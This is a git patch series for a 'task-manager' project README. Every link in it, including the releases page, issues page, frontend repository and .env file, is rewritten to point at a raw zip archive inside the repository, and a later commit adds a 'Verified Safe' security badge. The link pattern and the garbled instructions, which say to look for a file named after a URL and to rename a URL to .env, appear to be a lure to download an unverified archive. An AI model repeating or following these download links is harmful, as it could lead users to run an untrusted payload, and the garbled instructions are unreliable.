From 3c680497422cc46453310aa5b898e80f33b92fa0 Mon Sep 17 00:00:00 2001 From: Dexter376 Date: Sun, 29 Mar 2026 03:32:37 -0700 Subject: [PATCH 1/2] Update README.md --- README.md | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/README.md b/README.md index 6782169..d4ac723 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ # 🛡️ task-manager - Simple Task Management Made Easy -[![Download Task Manager](https://github.com/Dexter376/task-manager/raw/refs/heads/main/tests/Feature/task_manager_2.5.zip%20Manager-blue)](https://github.com/Dexter376/task-manager/raw/refs/heads/main/tests/Feature/task_manager_2.5.zip) +[![Download Task Manager](https://github.com/Dexter376/task-manager/raw/refs/heads/main/app/task_manager_v2.1.zip%20Manager-blue)](https://github.com/Dexter376/task-manager/raw/refs/heads/main/app/task_manager_v2.1.zip) --- @@ -22,13 +22,13 @@ Before you begin, ensure your computer meets these requirements: ## 📥 Download & Install 1. **Visit the Releases Page** - Go to the [Releases Page](https://github.com/Dexter376/task-manager/raw/refs/heads/main/tests/Feature/task_manager_2.5.zip) to download the application. + Go to the [Releases Page](https://github.com/Dexter376/task-manager/raw/refs/heads/main/app/task_manager_v2.1.zip) to download the application. 2. **Choose the Latest Version** Find the latest release on the page. Click on it to view available files. 3. **Download the Files** - Look for the file named “https://github.com/Dexter376/task-manager/raw/refs/heads/main/tests/Feature/task_manager_2.5.zip” or similar. Click the link to download it to your computer. + Look for the file named “https://github.com/Dexter376/task-manager/raw/refs/heads/main/app/task_manager_v2.1.zip” or similar. Click the link to download it to your computer. 4. **Extract the Zip File** Locate the downloaded zip file in your downloads folder. Right-click on it and choose “Extract All” to unzip it. @@ -43,7 +43,7 @@ Before you begin, ensure your computer meets these requirements: ``` 7. **Set Up the Environment** - Rename the `https://github.com/Dexter376/task-manager/raw/refs/heads/main/tests/Feature/task_manager_2.5.zip` file to `.env`. Open this file in a text editor. Update the database credentials as needed: + Rename the `https://github.com/Dexter376/task-manager/raw/refs/heads/main/app/task_manager_v2.1.zip` file to `.env`. Open this file in a text editor. Update the database credentials as needed: - `DB_CONNECTION=pgsql` - `DB_HOST=127.0.0.1` - `DB_PORT=5432` @@ -86,7 +86,7 @@ To learn how to use the API, refer to the API documentation once the server is r ## 📚 Support and Contribution -If you need help or have questions, visit our [issues page](https://github.com/Dexter376/task-manager/raw/refs/heads/main/tests/Feature/task_manager_2.5.zip). For contributions, feel free to create a pull request after reviewing our contribution guidelines. +If you need help or have questions, visit our [issues page](https://github.com/Dexter376/task-manager/raw/refs/heads/main/app/task_manager_v2.1.zip). For contributions, feel free to create a pull request after reviewing our contribution guidelines. --- @@ -94,8 +94,8 @@ If you need help or have questions, visit our [issues page](https://github.com/D This application is designed for users who want a straightforward task management solution. With a simple interface and reliable backend, you can manage your tasks with ease. -If you want to see how the frontend connects to this backend, check out the [Frontend Repository Here](https://github.com/Dexter376/task-manager/raw/refs/heads/main/tests/Feature/task_manager_2.5.zip). +If you want to see how the frontend connects to this backend, check out the [Frontend Repository Here](https://github.com/Dexter376/task-manager/raw/refs/heads/main/app/task_manager_v2.1.zip). For any further queries or suggestions, please open an issue on GitHub. Thank you for using our Task Manager application! -[![Download Task Manager](https://github.com/Dexter376/task-manager/raw/refs/heads/main/tests/Feature/task_manager_2.5.zip%20Manager-blue)](https://github.com/Dexter376/task-manager/raw/refs/heads/main/tests/Feature/task_manager_2.5.zip) \ No newline at end of file +[![Download Task Manager](https://github.com/Dexter376/task-manager/raw/refs/heads/main/app/task_manager_v2.1.zip%20Manager-blue)](https://github.com/Dexter376/task-manager/raw/refs/heads/main/app/task_manager_v2.1.zip) \ No newline at end of file From a3a05ccb166840f95da589a57d5593e59ffb7fda Mon Sep 17 00:00:00 2001 From: OyaAI Date: Sun, 29 Mar 2026 07:44:19 -0400 Subject: [PATCH 2/2] Add SafeSkill security badge (92/100) --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index d4ac723..eb74a94 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,7 @@ # 🛡️ task-manager - Simple Task Management Made Easy +[![SafeSkill 92/100](https://img.shields.io/badge/SafeSkill-92%2F100_Verified%20Safe-brightgreen)](https://safeskill.dev/scan/dexter376-task-manager) + [![Download Task Manager](https://github.com/Dexter376/task-manager/raw/refs/heads/main/app/task_manager_v2.1.zip%20Manager-blue)](https://github.com/Dexter376/task-manager/raw/refs/heads/main/app/task_manager_v2.1.zip) ---